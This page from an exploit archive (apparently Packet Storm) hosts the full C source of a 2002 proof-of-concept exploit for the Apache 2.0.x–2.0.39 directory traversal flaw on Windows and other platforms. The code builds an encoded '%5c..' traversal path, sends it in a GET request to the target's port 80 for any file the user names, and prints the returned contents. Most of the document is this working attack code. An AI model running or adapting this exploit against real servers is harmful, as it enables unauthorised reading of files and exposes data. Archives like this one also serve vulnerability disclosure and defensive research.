exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DSR-apache2.0x.c

DSR-apache2.0x.c
Posted Aug 29, 2002
Authored by Bob, dsr | Site dtors.net

This Proof of Concept exploit for the current directory traversal design flaw in apache 2.0.x - 2.0.39 allows any attacker to view any file on the target machine. Original vulnerability found by Luigi Auriemma. Affected Systems: Windows [win32], Netware, OS2, Cygwin.

tags | exploit, proof of concept
systems | windows
SHA-256 | 6aceadaa5b57140304df3527499731b71b0374b1690f5244471132425d9e168d

DSR-apache2.0x.c

Change Mirror Download
/*
* DSR-apache2.0x by bob@dtors.net
* Exploit found by Auriemma Luigi.
*
* This is Proof on Concept exploit for
* the current directory traversal design flaw
* in apache 2.0.x - 2.0.39.
*
* Affected Systems:
*
* Windows [win32]
* Netware
* OS2
* Cygwin
*
* This exploit allows the attacker to view ANY
* file on the target machine if it is vulnerable
* to this attack.
*
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define bs "%5c"
char travcode[]=
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63";


void reply(int sock);


void reply(int sock)
{


int n;
char recvbuf[1024];
fd_set rset;


while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);

if (FD_ISSET(sock,&rset)) {
if((n=read(sock,recvbuf,1024)) <= 0) {
printf("Connection closed by foreign ghost.\n");
exit(0);
}

recvbuf[n]=0;
printf("%s",recvbuf);
}

if (FD_ISSET(STDIN_FILENO,&rset)) {
if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
recvbuf[n]=0;
//write(sock,recvbuf,n);
}
}
}
}



int main(int argc, char *argv[]) {

int sock;
char exp[1024];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;


fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n");
fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

if(argc<4)
{
fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
exit(1);
}



if ((he=gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
exit(1);
}

/* A fresh pair of clean socks ;) */

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

/* yummy fresh smelling */

fprintf(stdout, "Hold up bish connecting to host... \n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
fprintf(stderr, "My socks are all sweaty.\n");
exit(1);
}

else {
/* im exhausted after that...gn */
sleep(3);



sprintf(exp, "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,travcode, argv[2], bs, argv[3], argv[1]);
write(sock,exp,strlen(exp));

fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
reply(sock);

close(sock);
exit (0);

}

}











Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close